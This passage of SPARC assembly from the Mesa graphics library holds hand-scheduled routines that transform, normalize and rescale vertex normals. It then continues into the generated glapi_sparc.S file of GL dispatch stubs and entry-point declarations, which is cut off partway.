	fadds %f6, %f8, %f6 ! FGA Group 2cyc stall f6,f8 available
	fadds %f6, %f10, %f6 ! FGA Group 4cyc stall f6,f10 available

	/* scale (f6) = 1.0 / sqrt(len) */
	fsqrts %f6, %f6 ! FDIV 20 cycles
	fdivs %f12, %f6, %f6 ! FDIV 14 cycles

	fmuls %f3, %f6, %f3
	st %f3, [%g3 + 0x00] ! out[i][0] = tx * scale
	fmuls %f5, %f6, %f5
	st %f5, [%g3 + 0x04] ! out[i][1] = ty * scale
	fmuls %f7, %f6, %f7
	st %f7, [%g3 + 0x08] ! out[i][2] = tz * scale

	cmp %o4, %g1 ! continue if (i < count)
	bl 1b
	 add %g3, 0x0c, %g3 ! advance out vector pointer

	ba 7f
	 nop

4:	/* LENGTHS != NULL */
	! Fold the uniform `scale` into the matrix once, outside the loop.
	fmuls M0, %f15, M0
	fmuls M1, %f15, M1
	fmuls M2, %f15, M2
	fmuls M4, %f15, M4
	fmuls M5, %f15, M5
	fmuls M6, %f15, M6
	fmuls M8, %f15, M8
	fmuls M9, %f15, M9
	fmuls M10, %f15, M10

5:
	ld [%o5 + 0x00], %f0 ! ux = from[0]
	ld [%o5 + 0x04], %f1 ! uy = from[1]
	ld [%o5 + 0x08], %f2 ! uz = from[2]
	add %o5, %g2, %o5 ! STRIDE_F(from, stride)
	add %o4, 1, %o4 ! i++

	/* tx (f3) = (ux * m0) + (uy * m1) + (uz * m2)
	 * ty (f5) = (ux * m4) + (uy * m5) + (uz * m6)
	 * tz (f7) = (ux * m8) + (uy * m9) + (uz * m10)
	 */
	fmuls %f0, M0, %f3 ! FGM Group
	fmuls %f1, M1, %f4 ! FGM Group
	fmuls %f0, M4, %f5 ! FGM Group
	fmuls %f1, M5, %f6 ! FGM Group
	fmuls %f0, M8, %f7 ! FGM Group f3 available
	fmuls %f1, M9, %f8 ! FGM Group f4 available
	fadds %f3, %f4, %f3 ! FGA
	fmuls %f2, M2, %f10 ! FGM Group f5 available
	fmuls %f2, M6, %f0 ! FGM Group f6 available
	fadds %f5, %f6, %f5 ! FGA
	fmuls %f2, M10, %f4 ! FGM Group f7 available
	fadds %f7, %f8, %f7 ! FGA Group f8,f3 available
	fadds %f3, %f10, %f3 ! FGA Group f10 available
	ld [%o3], %f13 ! LSU (lengths[i], loaded during the FP adds)
	fadds %f5, %f0, %f5 ! FGA Group stall f0,f5 available
	add %o3, 4, %o3 ! IEU0
	fadds %f7, %f4, %f7 ! FGA Group stall f4,f7 available

	/* f3=tx, f5=ty, f7=tz, f13=lengths[i] */

	fmuls %f3, %f13, %f3
	st %f3, [%g3 + 0x00] ! out[i][0] = tx * len
	fmuls %f5, %f13, %f5
	st %f5, [%g3 + 0x04] ! out[i][1] = ty * len
	fmuls %f7, %f13, %f7
	st %f7, [%g3 + 0x08] ! out[i][2] = tz * len

	cmp %o4, %g1 ! continue if (i < count)
	bl 5b
	 add %g3, 0x0c, %g3 ! advance out vector pointer

7:	retl
	 nop
/* As _mesa_sparc_transform_normalize_normals, but for matrices with no
 * rotation component: only the diagonal entries M0, M5, M10 of
 * mat->inv are used, so each component is a single multiply.
 * Args (o0=mat o1=scale o2=in o3=lengths o4=dest); same two paths:
 * unit-normalize when lengths == NULL, multiply by lengths[i] (with
 * the matrix pre-scaled by `scale`) otherwise. */
.globl _mesa_sparc_transform_normalize_normals_no_rot
_mesa_sparc_transform_normalize_normals_no_rot:
	/* o0=mat o1=scale o2=in o3=lengths o4=dest */

	! Bounce 1.0f and the float arg `scale` through the stack into
	! %f12 / %f15 (no direct int->fp register moves on this target).
	sethi %hi(ONE_DOT_ZERO), %g2
	sub %sp, 16, %sp
	st %g2, [%sp + STACK_VAR_OFF+0x0]
	st %o1, [%sp + STACK_VAR_OFF+0x4]
	ld [%sp + STACK_VAR_OFF+0x0], %f12 ! f12 = 1.0f
	ld [%sp + STACK_VAR_OFF+0x4], %f15 ! f15 = scale
	add %sp, 16, %sp

	LDPTR [%o0 + MAT_INV], %o0 ! o0 = mat->inv
	LDPTR [%o2 + V4F_START], %o5 ! o5 = 'from' in->start
	ld [%o2 + V4F_COUNT], %g1 ! g1 = in->count
	ld [%o2 + V4F_STRIDE], %g2 ! g2 = in->stride
	LDPTR [%o4 + V4F_START], %g3 ! g3 = 'out' dest->start

	LDMATRIX_0_5_10(%o0)		! diagonal-only matrix load

	/* dest->count = in->count */
	st %g1, [%o4 + V4F_COUNT]

	cmp %g1, 1
	bl 7f				! nothing to do for count < 1
	 cmp %o3, 0			! delay slot: test lengths pointer
	bne 4f				! lengths != NULL -> pre-scaled path
	 clr %o4			! 'i' for STRIDE_LOOP

1:	/* LENGTHS == NULL */
	ld [%o5 + 0x00], %f0 ! ux = from[0]
	ld [%o5 + 0x04], %f1 ! uy = from[1]
	ld [%o5 + 0x08], %f2 ! uz = from[2]
	add %o5, %g2, %o5 ! STRIDE_F(from, stride)
	add %o4, 1, %o4 ! i++

	/* tx (f3) = (ux * m0)
	 * ty (f5) = (uy * m5)
	 * tz (f7) = (uz * m10)
	 */
	fmuls %f0, M0, %f3 ! FGM Group
	fmuls %f1, M5, %f5 ! FGM Group
	fmuls %f2, M10, %f7 ! FGM Group

	/* f3=tx, f5=ty, f7=tz */

	/* len (f6) = (tx * tx) + (ty * ty) + (tz * tz) */
	fmuls %f3, %f3, %f6 ! FGM Group stall, f3 available
	fmuls %f5, %f5, %f8 ! FGM Group f5 available
	fmuls %f7, %f7, %f10 ! FGM Group f7 available
	fadds %f6, %f8, %f6 ! FGA Group 2cyc stall f6,f8 available
	fadds %f6, %f10, %f6 ! FGA Group 4cyc stall f6,f10 available

	/* scale (f6) = 1.0 / sqrt(len) */
	fsqrts %f6, %f6 ! FDIV 20 cycles
	fdivs %f12, %f6, %f6 ! FDIV 14 cycles

	fmuls %f3, %f6, %f3
	st %f3, [%g3 + 0x00] ! out[i][0] = tx * scale
	fmuls %f5, %f6, %f5
	st %f5, [%g3 + 0x04] ! out[i][1] = ty * scale
	fmuls %f7, %f6, %f7
	st %f7, [%g3 + 0x08] ! out[i][2] = tz * scale

	cmp %o4, %g1 ! continue if (i < count)
	bl 1b
	 add %g3, 0x0c, %g3 ! advance out vector pointer

	ba 7f
	 nop

4:	/* LENGTHS != NULL */
	! Fold the uniform `scale` into the diagonal once, outside the loop.
	fmuls M0, %f15, M0
	fmuls M5, %f15, M5
	fmuls M10, %f15, M10

5:
	ld [%o5 + 0x00], %f0 ! ux = from[0]
	ld [%o5 + 0x04], %f1 ! uy = from[1]
	ld [%o5 + 0x08], %f2 ! uz = from[2]
	add %o5, %g2, %o5 ! STRIDE_F(from, stride)
	add %o4, 1, %o4 ! i++

	/* tx (f3) = (ux * m0)
	 * ty (f5) = (uy * m5)
	 * tz (f7) = (uz * m10)
	 */
	fmuls %f0, M0, %f3 ! FGM Group
	ld [%o3], %f13 ! LSU (lengths[i])
	fmuls %f1, M5, %f5 ! FGM Group
	add %o3, 4, %o3 ! IEU0
	fmuls %f2, M10, %f7 ! FGM Group

	/* f3=tx, f5=ty, f7=tz, f13=lengths[i] */

	fmuls %f3, %f13, %f3
	st %f3, [%g3 + 0x00] ! out[i][0] = tx * len
	fmuls %f5, %f13, %f5
	st %f5, [%g3 + 0x04] ! out[i][1] = ty * len
	fmuls %f7, %f13, %f7
	st %f7, [%g3 + 0x08] ! out[i][2] = tz * len

	cmp %o4, %g1 ! continue if (i < count)
	bl 5b
	 add %g3, 0x0c, %g3 ! advance out vector pointer

7:	retl
	 nop
/* Rescale-only, no-rotation variant: out[i] = in[i] * diag(M0,M5,M10)
 * with the diagonal pre-multiplied by the uniform `scale`.  No
 * normalization and no per-normal lengths (the o3 arg is unused here).
 * Args: o0=mat o1=scale o2=in o3=lengths o4=dest. */
.globl _mesa_sparc_transform_rescale_normals_no_rot
_mesa_sparc_transform_rescale_normals_no_rot:
	/* o0=mat o1=scale o2=in o3=lengths o4=dest */

	! Bounce the float arg `scale` through the stack into %f15.
	sub %sp, 16, %sp
	st %o1, [%sp + STACK_VAR_OFF+0x0]
	ld [%sp + STACK_VAR_OFF+0x0], %f15 ! f15 = scale
	add %sp, 16, %sp

	LDPTR [%o0 + MAT_INV], %o0 ! o0 = mat->inv
	LDPTR [%o2 + V4F_START], %o5 ! o5 = 'from' in->start
	ld [%o2 + V4F_COUNT], %g1 ! g1 = in->count
	ld [%o2 + V4F_STRIDE], %g2 ! g2 = in->stride
	LDPTR [%o4 + V4F_START], %g3 ! g3 = 'out' dest->start

	LDMATRIX_0_5_10(%o0)		! diagonal-only matrix load

	/* dest->count = in->count */
	st %g1, [%o4 + V4F_COUNT]

	cmp %g1, 1
	bl 7f				! nothing to do for count < 1
	 clr %o4			! 'i' for STRIDE_LOOP

	! Fold the uniform `scale` into the diagonal once, outside the loop.
	fmuls M0, %f15, M0
	fmuls M5, %f15, M5
	fmuls M10, %f15, M10

1:	ld [%o5 + 0x00], %f0 ! ux = from[0]
	ld [%o5 + 0x04], %f1 ! uy = from[1]
	ld [%o5 + 0x08], %f2 ! uz = from[2]
	add %o5, %g2, %o5 ! STRIDE_F(from, stride)
	add %o4, 1, %o4 ! i++

	/* tx (f3) = (ux * m0)
	 * ty (f5) = (uy * m5)
	 * tz (f7) = (uz * m10)
	 */
	fmuls %f0, M0, %f3 ! FGM Group
	st %f3, [%g3 + 0x00] ! LSU
	fmuls %f1, M5, %f5 ! FGM Group
	st %f5, [%g3 + 0x04] ! LSU
	fmuls %f2, M10, %f7 ! FGM Group
	st %f7, [%g3 + 0x08] ! LSU

	cmp %o4, %g1 ! continue if (i < count)
	bl 1b
	 add %g3, 0x0c, %g3 ! advance out vector pointer

7:	retl
	 nop
/* Rescale variant with full 3x3 transform: out[i] = (M * in[i]) where
 * all nine matrix entries are pre-multiplied by the uniform `scale`.
 * No normalization and no per-normal lengths (o3 unused).
 * Args: o0=mat o1=scale o2=in o3=lengths o4=dest. */
.globl _mesa_sparc_transform_rescale_normals
_mesa_sparc_transform_rescale_normals:
	/* o0=mat o1=scale o2=in o3=lengths o4=dest */

	! Bounce the float arg `scale` through the stack into %f15.
	sub %sp, 16, %sp
	st %o1, [%sp + STACK_VAR_OFF+0x0]
	ld [%sp + STACK_VAR_OFF+0x0], %f15 ! f15 = scale
	add %sp, 16, %sp

	LDPTR [%o0 + MAT_INV], %o0 ! o0 = mat->inv
	LDPTR [%o2 + V4F_START], %o5 ! o5 = 'from' in->start
	ld [%o2 + V4F_COUNT], %g1 ! g1 = in->count
	ld [%o2 + V4F_STRIDE], %g2 ! g2 = in->stride
	LDPTR [%o4 + V4F_START], %g3 ! g3 = 'out' dest->start

	LDMATRIX_0_1_2_4_5_6_8_9_10(%o0)

	/* dest->count = in->count */
	st %g1, [%o4 + V4F_COUNT]

	cmp %g1, 1
	bl 7f				! nothing to do for count < 1
	 clr %o4			! 'i' for STRIDE_LOOP

	! Fold the uniform `scale` into all nine entries, outside the loop.
	fmuls M0, %f15, M0
	fmuls M1, %f15, M1
	fmuls M2, %f15, M2
	fmuls M4, %f15, M4
	fmuls M5, %f15, M5
	fmuls M6, %f15, M6
	fmuls M8, %f15, M8
	fmuls M9, %f15, M9
	fmuls M10, %f15, M10

1:	ld [%o5 + 0x00], %f0 ! ux = from[0]
	ld [%o5 + 0x04], %f1 ! uy = from[1]
	ld [%o5 + 0x08], %f2 ! uz = from[2]
	add %o5, %g2, %o5 ! STRIDE_F(from, stride)
	add %o4, 1, %o4 ! i++

	! tx/ty/tz = row dot products; stores interleaved with the adds.
	fmuls %f0, M0, %f3 ! FGM Group
	fmuls %f1, M1, %f4 ! FGM Group
	fmuls %f0, M4, %f5 ! FGM Group
	fmuls %f1, M5, %f6 ! FGM Group
	fmuls %f0, M8, %f7 ! FGM Group f3 available
	fmuls %f1, M9, %f8 ! FGM Group f4 available
	fadds %f3, %f4, %f3 ! FGA
	fmuls %f2, M2, %f10 ! FGM Group f5 available
	fmuls %f2, M6, %f0 ! FGM Group f6 available
	fadds %f5, %f6, %f5 ! FGA
	fmuls %f2, M10, %f4 ! FGM Group f7 available
	fadds %f7, %f8, %f7 ! FGA Group f8,f3 available
	fadds %f3, %f10, %f3 ! FGA Group f10 available
	st %f3, [%g3 + 0x00] ! LSU
	fadds %f5, %f0, %f5 ! FGA Group stall f0,f5 available
	st %f5, [%g3 + 0x04] ! LSU
	fadds %f7, %f4, %f7 ! FGA Group stall f4,f7 available
	st %f7, [%g3 + 0x08] ! LSU

	cmp %o4, %g1 ! continue if (i < count)
	bl 1b
	 add %g3, 0x0c, %g3 ! advance out vector pointer

7:	retl
	 nop
/*
 * _mesa_sparc_transform_normals_no_rot
 *
 * Register arguments (SPARC ABI):
 *   %o0 = mat      - only mat->inv is read
 *   %o1 = scale    - unused by this variant
 *   %o2 = in       - source GLvector4f (start/count/stride are read)
 *   %o3 = lengths  - unused by this variant
 *   %o4 = dest     - output GLvector4f; dest->count := in->count
 *
 * "No rotation" case: only the diagonal elements m0/m5/m10 of
 * mat->inv are loaded (LDMATRIX_0_5_10), so each output component is
 * a single multiply.  Output is stored densely, 12 bytes per normal.
 * Clobbers: %o0, %o4, %o5, %g1-%g3, %f0-%f7, condition codes.
 */
.globl _mesa_sparc_transform_normals_no_rot
_mesa_sparc_transform_normals_no_rot:
/* o0=mat o1=scale o2=in o3=lengths o4=dest */
LDPTR [%o0 + MAT_INV], %o0 ! o0 = mat->inv
LDPTR [%o2 + V4F_START], %o5 ! o5 = 'from' in->start
ld [%o2 + V4F_COUNT], %g1 ! g1 = in->count
ld [%o2 + V4F_STRIDE], %g2 ! g2 = in->stride
LDPTR [%o4 + V4F_START], %g3 ! g3 = 'out' dest->start
LDMATRIX_0_5_10(%o0) ! diagonal of mat->inv only
/* dest->count = in->count */
st %g1, [%o4 + V4F_COUNT]
cmp %g1, 1
bl 7f ! count < 1 -> nothing to do
clr %o4 ! delay slot: 'i' for STRIDE_LOOP = 0
1: ld [%o5 + 0x00], %f0 ! ux = from[0]
ld [%o5 + 0x04], %f1 ! uy = from[1]
ld [%o5 + 0x08], %f2 ! uz = from[2]
add %o5, %g2, %o5 ! STRIDE_F(from, stride)
add %o4, 1, %o4 ! i++
/* tx (f3) = (ux * m0)
 * ty (f5) = (uy * m5)
 * tz (f7) = (uz * m10)
 */
fmuls %f0, M0, %f3 ! FGM Group
st %f3, [%g3 + 0x00] ! LSU
fmuls %f1, M5, %f5 ! FGM Group
st %f5, [%g3 + 0x04] ! LSU
fmuls %f2, M10, %f7 ! FGM Group
st %f7, [%g3 + 0x08] ! LSU
cmp %o4, %g1 ! continue if (i < count)
bl 1b
add %g3, 0x0c, %g3 ! delay slot: advance out vector pointer
7: retl
nop
/*
 * _mesa_sparc_transform_normals
 *
 * Register arguments (SPARC ABI):
 *   %o0 = mat      - only mat->inv is read
 *   %o1 = scale    - unused by this variant
 *   %o2 = in       - source GLvector4f (start/count/stride are read)
 *   %o3 = lengths  - unused by this variant
 *   %o4 = dest     - output GLvector4f; dest->count := in->count
 *
 * General case: multiplies every 3-float source normal by the full
 * upper 3x3 of mat->inv (no scaling).  Same hand-scheduled loop body
 * as _mesa_sparc_transform_rescale_normals, minus the pre-scale.
 * Output is stored densely, 12 bytes per normal.
 * Clobbers: %o0, %o4, %o5, %g1-%g3, %f0-%f10, condition codes.
 */
.globl _mesa_sparc_transform_normals
_mesa_sparc_transform_normals:
/* o0=mat o1=scale o2=in o3=lengths o4=dest */
LDPTR [%o0 + MAT_INV], %o0 ! o0 = mat->inv
LDPTR [%o2 + V4F_START], %o5 ! o5 = 'from' in->start
ld [%o2 + V4F_COUNT], %g1 ! g1 = in->count
ld [%o2 + V4F_STRIDE], %g2 ! g2 = in->stride
LDPTR [%o4 + V4F_START], %g3 ! g3 = 'out' dest->start
LDMATRIX_0_1_2_4_5_6_8_9_10(%o0) ! load full 3x3 of mat->inv
/* dest->count = in->count */
st %g1, [%o4 + V4F_COUNT]
cmp %g1, 1
bl 7f ! count < 1 -> nothing to do
clr %o4 ! delay slot: 'i' for STRIDE_LOOP = 0
/* Hand-scheduled for the FGM/FGA pipelines; keep instruction order. */
1: ld [%o5 + 0x00], %f0 ! ux = from[0]
ld [%o5 + 0x04], %f1 ! uy = from[1]
ld [%o5 + 0x08], %f2 ! uz = from[2]
add %o5, %g2, %o5 ! STRIDE_F(from, stride)
add %o4, 1, %o4 ! i++
fmuls %f0, M0, %f3 ! FGM Group
fmuls %f1, M1, %f4 ! FGM Group
fmuls %f0, M4, %f5 ! FGM Group
fmuls %f1, M5, %f6 ! FGM Group
fmuls %f0, M8, %f7 ! FGM Group f3 available
fmuls %f1, M9, %f8 ! FGM Group f4 available
fadds %f3, %f4, %f3 ! FGA
fmuls %f2, M2, %f10 ! FGM Group f5 available
fmuls %f2, M6, %f0 ! FGM Group f6 available
fadds %f5, %f6, %f5 ! FGA
fmuls %f2, M10, %f4 ! FGM Group f7 available
fadds %f7, %f8, %f7 ! FGA Group f8,f3 available
fadds %f3, %f10, %f3 ! FGA Group f10 available
st %f3, [%g3 + 0x00] ! LSU   out[0] = ux*m0 + uy*m1 + uz*m2
fadds %f5, %f0, %f5 ! FGA Group stall f0,f5 available
st %f5, [%g3 + 0x04] ! LSU   out[1] = ux*m4 + uy*m5 + uz*m6
fadds %f7, %f4, %f7 ! FGA Group stall f4,f7 available
st %f7, [%g3 + 0x08] ! LSU   out[2] = ux*m8 + uy*m9 + uz*m10
cmp %o4, %g1 ! continue if (i < count)
bl 1b
add %g3, 0x0c, %g3 ! delay slot: advance out vector pointer
7: retl
nop
/*
 * _mesa_sparc_normalize_normals
 *
 * Register arguments (SPARC ABI):
 *   %o0 = mat      - unused by this variant
 *   %o1 = scale    - unused by this variant
 *   %o2 = in       - source GLvector4f (start/count/stride are read)
 *   %o3 = lengths  - optional per-normal scale array; may be NULL
 *   %o4 = dest     - output GLvector4f; dest->count := in->count
 *
 * Two paths:
 *   lengths == NULL: out[i] = in[i] * (1 / sqrt(|in[i]|^2))
 *                    (true normalization, fsqrts + fdivs per normal)
 *   lengths != NULL: out[i] = in[i] * lengths[i]
 *                    (presumably precomputed reciprocal lengths --
 *                     verify against the C fallback in m_norm_tmp.h)
 * Output is stored densely, 12 bytes per normal.
 * Clobbers: %o3, %o4, %o5, %g1-%g3, %f3-%f13, condition codes.
 */
.globl _mesa_sparc_normalize_normals
_mesa_sparc_normalize_normals:
/* o0=mat o1=scale o2=in o3=lengths o4=dest */
/* Materialize the constant 1.0f in %f12: sethi builds the high bits
 * of ONE_DOT_ZERO in %g2, which is bounced through the stack. */
sethi %hi(ONE_DOT_ZERO), %g2
sub %sp, 16, %sp
st %g2, [%sp + STACK_VAR_OFF+0x0]
ld [%sp + STACK_VAR_OFF+0x0], %f12 ! f12 = 1.0f
add %sp, 16, %sp
LDPTR [%o2 + V4F_START], %o5 ! o5 = 'from' in->start
ld [%o2 + V4F_COUNT], %g1 ! g1 = in->count
ld [%o2 + V4F_STRIDE], %g2 ! g2 = in->stride
LDPTR [%o4 + V4F_START], %g3 ! g3 = 'out' dest->start
/* dest->count = in->count */
st %g1, [%o4 + V4F_COUNT]
cmp %g1, 1
bl 7f ! count < 1 -> nothing to do
cmp %o3, 0 ! delay slot: test lengths ptr (harmless if branch taken)
bne 4f ! lengths != NULL -> precomputed-lengths path
clr %o4 ! delay slot: 'i' for STRIDE_LOOP = 0
1: /* LENGTHS == NULL */
ld [%o5 + 0x00], %f3 ! ux = from[0]
ld [%o5 + 0x04], %f5 ! uy = from[1]
ld [%o5 + 0x08], %f7 ! uz = from[2]
add %o5, %g2, %o5 ! STRIDE_F(from, stride)
add %o4, 1, %o4 ! i++
/* f3=tx, f5=ty, f7=tz */
/* len (f6) = (tx * tx) + (ty * ty) + (tz * tz) */
fmuls %f3, %f3, %f6 ! FGM Group f3 available
fmuls %f5, %f5, %f8 ! FGM Group f5 available
fmuls %f7, %f7, %f10 ! FGM Group f7 available
fadds %f6, %f8, %f6 ! FGA Group 2cyc stall f6,f8 available
fadds %f6, %f10, %f6 ! FGA Group 4cyc stall f6,f10 available
/* scale (f6) = 1.0 / sqrt(len) */
fsqrts %f6, %f6 ! FDIV 20 cycles
fdivs %f12, %f6, %f6 ! FDIV 14 cycles
fmuls %f3, %f6, %f3
st %f3, [%g3 + 0x00] ! out[i][0] = tx * scale
fmuls %f5, %f6, %f5
st %f5, [%g3 + 0x04] ! out[i][1] = ty * scale
fmuls %f7, %f6, %f7
st %f7, [%g3 + 0x08] ! out[i][2] = tz * scale
cmp %o4, %g1 ! continue if (i < count)
bl 1b
add %g3, 0x0c, %g3 ! delay slot: advance out vector pointer
ba 7f ! done with the NULL-lengths path
nop
4: /* LENGTHS != NULL */
5:
ld [%o5 + 0x00], %f3 ! ux = from[0]
ld [%o5 + 0x04], %f5 ! uy = from[1]
ld [%o5 + 0x08], %f7 ! uz = from[2]
add %o5, %g2, %o5 ! STRIDE_F(from, stride)
add %o4, 1, %o4 ! i++
ld [%o3], %f13 ! LSU   f13 = lengths[i]
add %o3, 4, %o3 ! IEU0  lengths++
/* f3=tx, f5=ty, f7=tz, f13=lengths[i] */
fmuls %f3, %f13, %f3
st %f3, [%g3 + 0x00] ! out[i][0] = tx * len
fmuls %f5, %f13, %f5
st %f5, [%g3 + 0x04] ! out[i][1] = ty * len
fmuls %f7, %f13, %f7
st %f7, [%g3 + 0x08] ! out[i][2] = tz * len
cmp %o4, %g1 ! continue if (i < count)
bl 5b
add %g3, 0x0c, %g3 ! delay slot: advance out vector pointer
7: retl
nop
/*
 * _mesa_sparc_rescale_normals
 *
 * Register arguments (SPARC ABI):
 *   %o0 = mat      - unused by this variant
 *   %o1 = scale    - float arriving in an integer register; bounced
 *                    through the stack below to reach %f15
 *   %o2 = in       - source GLvector4f (start/count/stride are read)
 *   %o3 = lengths  - unused by this variant
 *   %o4 = dest     - output GLvector4f; dest->count := in->count
 *
 * out[i] = in[i] * scale, for 3-float normals; output is stored
 * densely, 12 bytes per normal.
 * Clobbers: %o4, %o5, %g1-%g3, %f3, %f5, %f7, %f15, condition codes.
 *
 * Fix: removed a dead "sethi %hi(ONE_DOT_ZERO), %g2" (copy-paste
 * residue from _mesa_sparc_normalize_normals).  %g2 was overwritten
 * by the V4F_STRIDE load below before any use, so the instruction
 * had no effect.
 */
.globl _mesa_sparc_rescale_normals
_mesa_sparc_rescale_normals:
/* o0=mat o1=scale o2=in o3=lengths o4=dest */
/* Move 'scale' from %o1 into %f15 via a 16-byte stack bounce. */
sub %sp, 16, %sp
st %o1, [%sp + STACK_VAR_OFF+0x0]
ld [%sp + STACK_VAR_OFF+0x0], %f15 ! f15 = scale
add %sp, 16, %sp
LDPTR [%o2 + V4F_START], %o5 ! o5 = 'from' in->start
ld [%o2 + V4F_COUNT], %g1 ! g1 = in->count
ld [%o2 + V4F_STRIDE], %g2 ! g2 = in->stride
LDPTR [%o4 + V4F_START], %g3 ! g3 = 'out' dest->start
/* dest->count = in->count */
st %g1, [%o4 + V4F_COUNT]
cmp %g1, 1
bl 7f ! count < 1 -> nothing to do
clr %o4 ! delay slot: 'i' for STRIDE_LOOP = 0
1:
ld [%o5 + 0x00], %f3 ! ux = from[0]
ld [%o5 + 0x04], %f5 ! uy = from[1]
ld [%o5 + 0x08], %f7 ! uz = from[2]
add %o5, %g2, %o5 ! STRIDE_F(from, stride)
add %o4, 1, %o4 ! i++
/* f3=tx, f5=ty, f7=tz */
fmuls %f3, %f15, %f3
st %f3, [%g3 + 0x00] ! out[i][0] = tx * scale
fmuls %f5, %f15, %f5
st %f5, [%g3 + 0x04] ! out[i][1] = ty * scale
fmuls %f7, %f15, %f7
st %f7, [%g3 + 0x08] ! out[i][2] = tz * scale
cmp %o4, %g1 ! continue if (i < count)
bl 1b
add %g3, 0x0c, %g3 ! delay slot: advance out vector pointer
7: retl
nop
/* --------------------------------------------------------------------
 * NOTE(review): dataset-concatenation artifact removed here.  The
 * stray lines were repository metadata ("AIFM-sys/AIFM", "117,066",
 * "shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/sparc/glapi_sparc.S"),
 * not assembly.  Everything below this marker is the beginning of the
 * next concatenated file, glapi_sparc.S.
 * ------------------------------------------------------------------ */
/* DO NOT EDIT - This file generated automatically by gl_SPARC_asm.py (from Mesa) script */
/*
* Copyright (C) 1999-2003 Brian Paul All Rights Reserved.
* (C) Copyright IBM Corporation 2004
* All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sub license,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice (including the next
* paragraph) shall be included in all copies or substantial portions of the
* Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL, IBM,
* AND/OR THEIR SUPPLIERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF
* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
#include "glapioffsets.h"
/*
 * GL_STUB(fn, off): emit the dispatch stub for GL entry point 'fn'.
 *
 * The stub loads a pointer to the current dispatch table, fetches
 * function slot 'off' from it, and tail-jumps through it ("jmpl
 * %g5, %g0" does not write a return address, so the real GL function
 * returns directly to the original caller, with all argument
 * registers untouched).
 *
 * The 0xDEADBEEF constants are placeholders written by the generator
 * script; presumably the glapi loader patches them at runtime with
 * the address of the dispatch-table pointer and then flushes the
 * icache via __glapi_sparc_icache_flush below -- TODO confirm
 * against the glapi runtime code.
 *
 * 64-bit variant: the patched address is assembled from two 32-bit
 * halves (sethi/or + sllx/ldx) and table entries are 8 bytes (8*off);
 * 32-bit variant uses a single sethi/ld and 4-byte entries (4*off).
 */
#ifdef __arch64__
# define GL_STUB(fn,off) \
fn: \
sethi %hi(0xDEADBEEF), %g4 ; \
sethi %hi(0xDEADBEEF), %g1 ; \
or %g4, %lo(0xDEADBEEF), %g4 ; \
or %g1, %lo(0xDEADBEEF), %g1 ; \
sllx %g4, 32, %g4 ; \
ldx [%g1 + %g4], %g1 ; \
sethi %hi(8 * off), %g4 ; \
or %g4, %lo(8 * off), %g4 ; \
ldx [%g1 + %g4], %g5 ; \
jmpl %g5, %g0 ; \
nop
#else
# define GL_STUB(fn,off) \
fn: \
sethi %hi(0xDEADBEEF), %g1 ; \
ld [%g1 + %lo(0xDEADBEEF)], %g1 ; \
ld [%g1 + (4 * off)], %g5 ; \
jmpl %g5, %g0 ; \
nop
#endif
/* GL_STUB_ALIAS(fn, alias): make 'fn' a symbol alias for 'alias'. */
#define GL_STUB_ALIAS(fn,alias) fn = alias
.text
.align 32
/*
 * void __glapi_sparc_icache_flush(void *insn_addr)
 *
 * In:  %o0 = address of (modified) instruction memory.
 * Executes the SPARC FLUSH instruction on %o0 so the instruction
 * cache observes code that was just written -- needed after the
 * GL_STUB placeholders above are patched in memory.
 * Leaf routine: retl returns via %o7; no registers clobbered.
 */
.globl __glapi_sparc_icache_flush ; .type __glapi_sparc_icache_flush,#function
__glapi_sparc_icache_flush: /* %o0 = insn_addr */
flush %o0
retl
nop
.data
.align 64
.globl glNewList ; .type glNewList,#function
.globl glEndList ; .type glEndList,#function
.globl glCallList ; .type glCallList,#function
.globl glCallLists ; .type glCallLists,#function
.globl glDeleteLists ; .type glDeleteLists,#function
.globl glGenLists ; .type glGenLists,#function
.globl glListBase ; .type glListBase,#function
.globl glBegin ; .type glBegin,#function
.globl glBitmap ; .type glBitmap,#function
.globl glColor3b ; .type glColor3b,#function
.globl glColor3bv ; .type glColor3bv,#function
.globl glColor3d ; .type glColor3d,#function
.globl glColor3dv ; .type glColor3dv,#function
.globl glColor3f ; .type glColor3f,#function
.globl glColor3fv ; .type glColor3fv,#function
.globl glColor3i ; .type glColor3i,#function
.globl glColor3iv ; .type glColor3iv,#function
.globl glColor3s ; .type glColor3s,#function
.globl glColor3sv ; .type glColor3sv,#function
.globl glColor3ub ; .type glColor3ub,#function
.globl glColor3ubv ; .type glColor3ubv,#function
.globl glColor3ui ; .type glColor3ui,#function
.globl glColor3uiv ; .type glColor3uiv,#function
.globl glColor3us ; .type glColor3us,#function
.globl glColor3usv ; .type glColor3usv,#function
.globl glColor4b ; .type glColor4b,#function
.globl glColor4bv ; .type glColor4bv,#function
.globl glColor4d ; .type glColor4d,#function
.globl glColor4dv ; .type glColor4dv,#function
.globl glColor4f ; .type glColor4f,#function
.globl glColor4fv ; .type glColor4fv,#function
.globl glColor4i ; .type glColor4i,#function
.globl glColor4iv ; .type glColor4iv,#function
.globl glColor4s ; .type glColor4s,#function
.globl glColor4sv ; .type glColor4sv,#function
.globl glColor4ub ; .type glColor4ub,#function
.globl glColor4ubv ; .type glColor4ubv,#function
.globl glColor4ui ; .type glColor4ui,#function
.globl glColor4uiv ; .type glColor4uiv,#function
.globl glColor4us ; .type glColor4us,#function
.globl glColor4usv ; .type glColor4usv,#function
.globl glEdgeFlag ; .type glEdgeFlag,#function
.globl glEdgeFlagv ; .type glEdgeFlagv,#function
.globl glEnd ; .type glEnd,#function
.globl glIndexd ; .type glIndexd,#function
.globl glIndexdv ; .type glIndexdv,#function
.globl glIndexf ; .type glIndexf,#function
.globl glIndexfv ; .type glIndexfv,#function
.globl glIndexi ; .type glIndexi,#function
